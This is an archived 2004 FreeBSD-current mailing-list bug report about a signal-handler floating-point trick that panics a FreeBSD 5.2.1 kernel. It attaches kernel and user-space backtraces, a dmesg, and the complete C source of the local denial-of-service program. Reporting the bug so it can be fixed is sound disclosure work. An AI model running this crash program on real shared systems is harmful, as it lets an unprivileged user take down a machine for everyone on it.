Date: Wed, 16 Jun 2004 12:57:06 +0200 From: Simon Barner <barner@in.tum.de> To: current@freebsd.org Subject: Bogus signal handler causes kernel panic (5.2.1-p8/i386) Message-ID: <20040616105706.GC1140@zi025.glhnet.mhn.de>
next in thread | raw e-mail | index | archive | help
--qGV0fN9tzfkG3CxV Content-Type: multipart/mixed; boundary="KDt/GgjP6HVcx58l" Content-Disposition: inline --KDt/GgjP6HVcx58l Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi, I tried the local denial of service attack described in [1], that was reported for Linux 2.4 and 2.6 some days ago (see [2] for the original thread in linux.kernel) on my FreeBSD 5.2.1-p8 system. The result is a kernel panic (back trace attached). Since des@ told me in a private mail, that he could not reprocduce the panic on -CURRENT, I'd like to ask how to proceed from here. Is the problem known to be fixed in current? Is somebody able to reproduce this on FreeBSD 5.2.1 (I am sorry, upgrading to -CURRENT is out of question for me)? Please note, that the problem does not exist on FreeBSD 4.9 (the test program simply dumps core (bt attached)). Thanks in advance for your hints, Simon [1] http://linuxreviews.org/news/2004-06-11_kernel_crash/#toc1 [2] http://groups.google.de/groups?hl=de&lr=&ie=UTF-8&frame=right&th=f7580d647408b95b&seekm=26hGq-Zr-31%40gated-at.bofh.it#link1 --KDt/GgjP6HVcx58l Content-Type: text/plain; charset=utf-8 Content-Disposition: attachment; filename="FreeBSD4.log" Content-Transfer-Encoding: quoted-printable Script started on Tue Jun 15 10:35:59 2004 =1B[=3D0;0B****************************** Kalender ************************= *****=0D 15 Jun Edward (Edvard Hagerup) Grieg born in Bergen, Norway, 1843=0D 16 Jun Hammurabi the Great dies, Babylon, 1686 BC=0D 15 Jun UNIVAC I delivered to the Census Bureau, 1951=0D 16 Jun First programming error at Census Bureau, 1951 (apocryphal)=0D 15 Jun Harry Nilsson is born in Brooklyn, 1941=0D 16 Jun The Monterey Pop festival opens, 1967=0D *********************************************************************=0D =0D=1B[m=1B[27m=1B[Jzi025:~ % =1B[Kg=08gdb a.out a.out.core =08=0D=0D GNU gdb 4.18 (FreeBSD)=0D Copyright 1998 Free Software Foundation, Inc.=0D GDB is free software, covered by the GNU General Public License, and you ar= e=0D welcome to change it and/or distribute copies of it under certain condition= s.=0D Type "show copying" to see the conditions.=0D There is absolutely no warranty for GDB. Type "show warranty" for details.= =0D This GDB was configured as "i386-unknown-freebsd"...Deprecated bfd_read cal= led at /usr/src/gnu/usr.bin/binutils/gdb/../../../../contrib/gdb/gdb/dbxrea= d.c line 2627 in elfstab_build_psymtabs=0D Deprecated bfd_read called at /usr/src/gnu/usr.bin/binutils/gdb/../../../..= /contrib/gdb/gdb/dbxread.c line 933 in fill_symbuf=0D =0D Core was generated by `a.out'.=0D Program terminated with signal 8, Floating point exception.=0D Reading symbols from /usr/lib/libc.so.4...done.=0D Reading symbols from /usr/libexec/ld-elf.so.1...done.=0D #0 0x804854f in Handler (ignore=3D14) at linux-kernel-crash.c:8=0D 8 __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));=0D (gdb) bt=0D #0 0x804854f in Handler (ignore=3D14) at linux-kernel-crash.c:8=0D #1 0xbfbfffac in ?? ()=0D #2 0x80484a6 in _start ()=0D (gdb) bt full=0D #0 0x804854f in Handler (ignore=3D14) at linux-kernel-crash.c:8=0D fpubuf =3D "\000\000=C3=BF=C3=BF=C3=BF=C3=BF=C3=BF=C3=BF3=C3=A1(=C3=80\b\0= 00=C3=90\001\000\000\000\000\000\000=C3=BF=C3=BF", '\000' <repeats 37 times= >, "\200=C3=BF?\000\000\000\000\000\000\000\200=C3=AB?\000\000\000\000\000\= 000\000\200=C3=BF?\000\220=C2=AA&\210=C2=BA\017\200=C3=BF?\000=C5=A1\215=C3= =A9\tK<=C2=A0=C3=B6?=C3=B2=C3=A2\004("=0D #1 0xbfbfffac in ?? ()=0D No symbol table info available.=0D #2 0x80484a6 in _start ()=0D No symbol table info available.=0D (gdb) =0D=1B[m=1B[27m=1B[Jzi025:~ % =1B[K=0D=0D Script done on Tue Jun 15 10:36:14 2004 FreeBSD zi025.glhnet.mhn.de 4.9-STABLE FreeBSD 4.9-STABLE #1: Wed Mar 10 04= :01:44 CET 2004 simon@zi025.glhnet.mhn.de:/usr/src/sys/compile/KISTE i386 --KDt/GgjP6HVcx58l Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: attachment; filename="FreeBSD5.log" Content-Transfer-Encoding: quoted-printable Script started on Tue Jun 15 10:40:03 2004 =0D=1B[m=0F=1B[27m=1B[24m=1B[Jzi025:/home/simon # =1B[Kg=08gdb -k /v=08 =08= sys/compat/=08 =08=08 =08=08 =08=08 =08=08 =08=08 =08=08 =08i4b/com=07p=07= =08 =08=08 =08=08 =08=08 =08=08 =08=08 =08=08 =08386/compile/KISTE/kernel.d= ebug /var/crash/vmcore.=1B[K3=08 =082 =08=0D=0D GNU gdb 5.2.1 (FreeBSD)=0D Copyright 2002 Free Software Foundation, Inc.=0D GDB is free software, covered by the GNU General Public License, and you ar= e=0D welcome to change it and/or distribute copies of it under certain condition= s.=0D Type "show copying" to see the conditions.=0D There is absolutely no warranty for GDB. Type "show warranty" for details.= =0D This GDB was configured as "i386-unknown-freebsd"...=0D panic: arithmetic trap=0D panic messages:=0D ---=0D Fatal trap 6: arithmetic trap while in kernel mode=0D instruction pointer =3D 0x8:0xc061670a=0D stack pointer =3D 0x10:0xcc4299e4=0D frame pointer =3D 0x10:0xcc4299e4=0D code segment =3D base 0x0, limit 0xfffff, type 0x1b=0D =3D DPL 0, pres 1, def32 1, gran 1=0D processor eflags =3D resume, IOPL =3D 0=0D current process =3D 56940 (a.out)=0D trap number =3D 6=0D panic: arithmetic trap=0D =0D syncing disks, buffers remaining... 1819 1819 1818 1818 1818 1818 1818 1818= 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 =0D giving up on 1102 buffers=0D Uptime: 23h21m6s=0D Dumping 192 MB=0D [CTRL-C to abort] [CTRL-C to abort] [CTRL-C to abort] 16 32 48 64 80 96 11= 2 128 144 160 176=0D ---=0D Reading symbols from /boot/kernel/fdescfs.ko...done.=0D Loaded symbols for /boot/kernel/fdescfs.ko=0D Reading symbols from /boot/kernel/green_saver.ko...done.=0D Loaded symbols for /boot/kernel/green_saver.ko=0D #0 doadump () at ../../../kern/kern_shutdown.c:240=0D 240 dumping++;=0D (kgdb) bt=0D #0 doadump () at ../../../kern/kern_shutdown.c:240=0D #1 0xc04f0cbb in boot (howto=3D256) at ../../../kern/kern_shutdown.c:372=0D #2 0xc04f0f91 in panic () at ../../../kern/kern_shutdown.c:550=0D #3 0xc0611f68 in trap_fatal (frame=3D0xcc4299a4, eva=3D0)=0D at ../../../i386/i386/trap.c:821=0D #4 0xc0611ab4 in trap (frame=3D=0D {tf_fs =3D 24, tf_es =3D 16, tf_ds =3D 16, tf_edi =3D 0, tf_esi =3D -= 1033510592, tf_ebp =3D -868050460, tf_isp =3D -868050480, tf_ebx =3D 514, t= f_edx =3D -1033510592, tf_ecx =3D -868050288, tf_eax =3D -868050288, tf_tra= pno =3D 6, tf_err =3D 0, tf_eip =3D -1067358454, tf_cs =3D 8, tf_eflags =3D= 65606, tf_esp =3D -868050444, tf_ss =3D -1067358532})=0D at ../../../i386/i386/trap.c:618=0D #5 0xc0605998 in calltrap () at {standard input}:94=0D #6 0xc06166bc in npxsetregs (td=3D0x0, addr=3D0x0) at ../../../i386/isa/np= x.c:954=0D #7 0xc060bd6b in set_fpcontext (td=3D0xc265e140, mcp=3D0x0)=0D at ../../../i386/i386/machdep.c:2529=0D #8 0xc060a76a in sigreturn (td=3D0xc265e140, uap=3D0x0)=0D at ../../../i386/i386/machdep.c:982=0D #9 0xc061224b in syscall (frame=3D=0D {tf_fs =3D 47, tf_es =3D 47, tf_ds =3D 47, tf_edi =3D -1077942784, tf= _esi =3D -1077942776, tf_ebp =3D -1077942856, tf_isp =3D -868049548, tf_ebx= =3D 1, tf_edx =3D 672409248, tf_ecx =3D 13, tf_eax =3D 417, tf_trapno =3D = 22, tf_err =3D 2, tf_eip =3D -1077936211, tf_cs =3D 31, tf_eflags =3D 582, = tf_esp =3D -1077943720, tf_ss =3D 47})=0D at ../../../i386/i386/trap.c:1010=0D #10 0xc06059ed in Xint0x80_syscall () at {standard input}:136=0D ---Can't read userspace from dump, or kernel process---=0D =0D (kgdb) bt full=0D #0 doadump () at ../../../kern/kern_shutdown.c:240=0D No locals.=0D #1 0xc04f0cbb in boot (howto=3D256) at ../../../kern/kern_shutdown.c:372=0D No locals.=0D #2 0xc04f0f91 in panic () at ../../../kern/kern_shutdown.c:550=0D td =3D (struct thread *) 0xc265e140=0D bootopt =3D 256=0D newpanic =3D 0=0D ap =3D 0xcc42994c "G\001e=C0"=0D buf =3D "arithmetic trap", '\0' <repeats 240 times>=0D #3 0xc0611f68 in trap_fatal (frame=3D0xcc4299a4, eva=3D0)=0D at ../../../i386/i386/trap.c:821=0D code =3D 16=0D type =3D 6=0D ss =3D 16=0D esp =3D 0=0D softseg =3D {ssd_base =3D 0, ssd_limit =3D 1048575, ssd_type =3D 27, =0D ssd_dpl =3D 0, ssd_p =3D 1, ssd_xx =3D 0, ssd_xx1 =3D 0, ssd_def32 =3D 1,= ssd_gran =3D 1}=0D #4 0xc0611ab4 in trap (frame=3D=0D {tf_fs =3D 24, tf_es =3D 16, tf_ds =3D 16, tf_edi =3D 0, tf_esi =3D -= 1033510592, tf_ebp =3D -868050460, tf_isp =3D -868050480, tf_ebx =3D 514, t= f_edx =3D -1033510592, tf_ecx =3D -868050288, tf_eax =3D -868050288, tf_tra= pno =3D 6, tf_err =3D 0, tf_eip =3D -1067358454, tf_cs =3D 8, tf_eflags =3D= 65606, tf_esp =3D -868050444, tf_ss =3D -1067358532})=0D at ../../../i386/i386/trap.c:618=0D td =3D (struct thread *) 0xc265e140=0D p =3D (struct proc *) 0xc265da98=0D sticks =3D 3261455000=0D i =3D 0=0D ucode =3D 0=0D type =3D 6=0D code =3D 0=0D eva =3D 0=0D #5 0xc0605998 in calltrap () at {standard input}:94=0D No locals.=0D #6 0xc06166bc in npxsetregs (td=3D0x0, addr=3D0x0) at ../../../i386/isa/np= x.c:954=0D s =3D 514=0D #7 0xc060bd6b in set_fpcontext (td=3D0xc265e140, mcp=3D0x0)=0D at ../../../i386/i386/machdep.c:2529=0D addr =3D (union savefpu *) 0xcc429a90=0D #8 0xc060a76a in sigreturn (td=3D0xc265e140, uap=3D0x0)=0D at ../../../i386/i386/machdep.c:982=0D uc =3D {uc_sigmask =3D {__bits =3D {0, 0, 0, 0}}, uc_mcontext =3D {=0D mc_onstack =3D 0, mc_gs =3D 47, mc_fs =3D 47, mc_es =3D 47, mc_ds =3D 4= 7, =0D mc_edi =3D -1077942784, mc_esi =3D -1077942776, mc_ebp =3D -1077942856,= =0D mc_isp =3D -868049548, mc_ebx =3D 1, mc_edx =3D 672409248, mc_ecx =3D 1= 3, =0D mc_eax =3D 1, mc_trapno =3D 12, mc_err =3D 2, mc_eip =3D 671874187, mc_= cs =3D 31, =0D mc_eflags =3D 662, mc_esp =3D -1077942900, mc_ss =3D 47, mc_len =3D 640= , =0D mc_fpformat =3D 65537, mc_ownedfp =3D 131074, mc_spare1 =3D {0}, mc_fps= tate =3D {=0D ---Type <return> to continue, or q <return> to quit---=0D -60801, -65536, -1, 0, 0, 0, -65536, 613566464, -2061200823, -5368545= 28, =0D -1, 1073451007, 0, 0, 1207959552, -1840700270, 1073775908, 0, -631613= 44, =0D 16382, -251658240, 1073279216, 0, -286322986, 16391, 1011515392, =0D 1073865788, 0 <repeats 101 times>}, mc_spare2 =3D {0, 0, 0, 0, 0, 0, = 0, =0D 0}}, uc_link =3D 0x0, uc_stack =3D {ss_sp =3D 0x0, ss_size =3D 0, ss_= flags =3D 4}, =0D uc_flags =3D 0, __spare__ =3D {0, 0, 0, 0}}=0D p =3D (struct proc *) 0xc265da98=0D regs =3D (struct trapframe *) 0xcc429d48=0D cs =3D 0=0D eflags =3D 662=0D error =3D 0=0D ret =3D 0=0D #9 0xc061224b in syscall (frame=3D=0D {tf_fs =3D 47, tf_es =3D 47, tf_ds =3D 47, tf_edi =3D -1077942784, tf= _esi =3D -1077942776, tf_ebp =3D -1077942856, tf_isp =3D -868049548, tf_ebx= =3D 1, tf_edx =3D 672409248, tf_ecx =3D 13, tf_eax =3D 417, tf_trapno =3D = 22, tf_err =3D 2, tf_eip =3D -1077936211, tf_cs =3D 31, tf_eflags =3D 582, = tf_esp =3D -1077943720, tf_ss =3D 47})=0D at ../../../i386/i386/trap.c:1010=0D params =3D 0xbfbfe25c---Can't read userspace from dump, or kernel process-= --=0D =0D (kgdb) =0D=1B[m=0F=1B[27m=1B[24m=1B[Jzi025:/home/simon # =1B[K=0D=0D Script done on Tue Jun 15 10:40:48 2004 FreeBSD zi025.glhnet.mhn.de 5.2.1-RELEASE-p8 FreeBSD 5.2.1-RELEASE-p8 #1: M= on May 31 13:29:26 CEST 2004 simon@zi025.glhnet.mhn.de:/usr/src/sys/i386/co= mpile/KISTE i386 --KDt/GgjP6HVcx58l Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="crash.c.txt" #include <sys/time.h> #include <signal.h> #include <unistd.h> static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1); return 0; } --KDt/GgjP6HVcx58l Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=dmesg Content-Transfer-Encoding: quoted-printable Copyright (c) 1992-2004 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 5.2.1-RELEASE-p8 #1: Mon May 31 13:29:26 CEST 2004 simon@zi025.glhnet.mhn.de:/usr/src/sys/i386/compile/KISTE Preloaded elf kernel "/boot/kernel/kernel" at 0xc0753000. Timecounter "i8254" frequency 1193182 Hz quality 0 CPU: AMD-K6(tm) 3D+ Processor (400.91-MHz 586-class CPU) Origin =3D "AuthenticAMD" Id =3D 0x591 Stepping =3D 1 Features=3D0x8021bf<FPU,VME,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX> AMD Features=3D0x80000800<SYSCALL,3DNow!> real memory =3D 201326592 (192 MB) avail memory =3D 190103552 (181 MB) netsmb_dev: loaded K6-family MTRR support enabled (2 registers) npx0: [FAST] npx0: <math processor> on motherboard npx0: INT 16 interface pcibios: BIOS version 2.10 Using $PIR table, 5 entries at 0xc00fdde0 pcib0: <VIA 82C598MVP (Apollo MVP3) host bridge> at pcibus 0 on motherboard pci0: <PCI bus> on pcib0 pci_cfgintr: 0:17 INTA BIOS irq 9 pci_cfgintr: 0:18 INTA BIOS irq 3 pcib1: <PCI-PCI bridge> at device 1.0 on pci0 pci1: <PCI bus> on pcib1 isab0: <PCI-ISA bridge> at device 7.0 on pci0 isa0: <ISA bus> on isab0 atapci0: <VIA 82C586B UDMA33 controller> port 0xe000-0xe00f at device 7.1 o= n pci0 ata0: at 0x1f0 irq 14 on atapci0 ata0: [MPSAFE] ata1: at 0x170 irq 15 on atapci0 ata1: [MPSAFE] xl0: <3Com 3c905-TX Fast Etherlink XL> port 0xe800-0xe83f irq 9 at device 1= 7.0 on pci0 xl0: Ethernet address: 00:60:08:4a:00:e5 miibus0: <MII bus> on xl0 nsphy0: <DP83840 10/100 media interface> on miibus0 nsphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto pci0: <display, VGA> at device 18.0 (no driver attached) orm0: <Option ROM> at iomem 0xc0000-0xc87ff on isa0 pmtimer0 on isa0 atkbdc0: <Keyboard controller (i8042)> at port 0x64,0x60 on isa0 atkbd0: <AT Keyboard> flags 0x1 irq 1 on atkbdc0 kbd0 at atkbd0 psm0: <PS/2 Mouse> irq 12 on atkbdc0 psm0: model Generic PS/2 mouse, device ID 0 fdc0: <Enhanced floppy controller (i82077, NE72065 or clone)> at port 0x3f7= ,0x3f0-0x3f5 irq 6 drq 2 on isa0 fdc0: FIFO enabled, 8 bytes threshold fd0: <1440-KB 3.5" drive> on fdc0 drive 0 ppc0: <Parallel port> at port 0x378-0x37f irq 7 on isa0 ppc0: SMC-like chipset (ECP/EPP/PS2/NIBBLE) in COMPATIBLE mode ppc0: FIFO with 16/16/15 bytes threshold ppbus0: <Parallel port bus> on ppc0 lpt0: <Printer> on ppbus0 lpt0: Interrupt-driven port ppi0: <Parallel I/O> on ppbus0 sc0: <System console> at flags 0x100 on isa0 sc0: VGA <16 virtual consoles, flags=3D0x300> sio0: configured irq 4 not in bitmap of probed irqs 0 sio0: port may not be enabled sio0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0 sio0: type 8250 or not responding sio1: configured irq 3 not in bitmap of probed irqs 0 sio1: port may not be enabled vga0: <Generic ISA VGA> at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0 sbc0: <ESS ES1868> at port 0x330-0x331,0x388-0x38b,0x220-0x22f irq 5 drq 0,= 1 on isa0 pcm0: <ESS 18xx DSP> on sbc0 ata2: <Generic ESDI/IDE/ATA controller> at port 0x36e-0x36f,0x168-0x16f irq= 10 on isa0 ata2: [MPSAFE] unknown: <PNP0303> can't assign resources (port) unknown: <PNP0f13> can't assign resources (irq) unknown: <PNP0700> can't assign resources (port) unknown: <PNP0401> can't assign resources (port) Timecounter "TSC" frequency 400911461 Hz quality 800 Timecounters tick every 10.000 msec IP Filter: v3.4.31 initialized. Default =3D block all, Logging =3D enabled GEOM: create disk ad0 dp=3D0xc2350360 ad0: 9787MB <WDC WD102AA> [19885/16/63] at ata0-master UDMA33 acd0: CDRW <HL-DT-ST RW/DVD GCC-4120B> at ata1-master PIO4 GEOM: create disk ad3 dp=3D0xc2350160 ad3: 117246MB <Maxtor 6Y120L0> [238216/16/63] at ata1-slave UDMA33 GEOM: create disk cd0 dp=3D0xc22e7e00 cd0 at ata1 bus 0 target 0 lun 0 cd0: <HL-DT-ST RW/DVD GCC-4120B 2.02> Removable CD-ROM SCSI-0 device=20 cd0: 16.000MB/s transfers cd0: Attempt to query device size failed: NOT READY, Medium not present Mounting root from ufs:/dev/ad0s2a --KDt/GgjP6HVcx58l-- --qGV0fN9tzfkG3CxV Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFA0CeCCkn+/eutqCoRAmTkAKDbRKb726Ccc/7pZZY9Dk6n2Xf6+ACfYNIC ayujzLM3nomCEa5XZyHEpQo= =joOw -----END PGP SIGNATURE----- --qGV0fN9tzfkG3CxV--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20040616105706.GC1140>